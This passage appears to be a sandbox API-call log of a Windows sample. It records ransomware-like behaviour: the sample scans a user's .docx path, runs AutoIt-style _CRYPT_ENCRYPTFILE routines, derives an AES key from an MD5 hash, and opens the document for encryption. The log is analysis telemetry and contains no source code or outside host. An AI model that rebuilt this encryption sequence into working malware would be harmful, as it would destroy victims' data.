cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.362] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.362] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0177.362] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.362] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.362] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.362] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.362] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.363] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.363] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.363] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb3490, ftCreationTime.dwHighDateTime=0x1d5df7c, ftLastAccessTime.dwLowDateTime=0xc074c380, ftLastAccessTime.dwHighDateTime=0x1d5de08, ftLastWriteTime.dwLowDateTime=0xc074c380, ftLastWriteTime.dwHighDateTime=0x1d5de08, nFileSizeHigh=0x0, nFileSizeLow=0xd070, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="8KAz.docx", cAlternateFileName="8KAZ~1.DOC")) returned 0x90af58 [0177.363] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0177.363] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.363] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.363] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.363] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.363] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0177.363] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.363] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0177.364] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.364] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.364] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0177.364] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.364] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.364] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.364] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.364] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.364] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0177.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.364] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0177.365] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.365] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.365] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0177.366] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.366] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.366] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0177.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.366] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.366] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.366] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.367] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.367] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.367] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.367] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.367] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.367] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.367] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.367] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.367] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.382] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0177.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.383] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0177.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.383] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.383] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0177.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.383] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.383] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.383] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.383] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0177.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.384] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.384] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0177.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.384] CryptDestroyHash (hHash=0x90ae18) returned 1 [0177.384] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.384] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\8kaz.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.385] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.386] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0177.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0177.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.386] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0177.386] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.386] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.388] RtlAllocateHeap 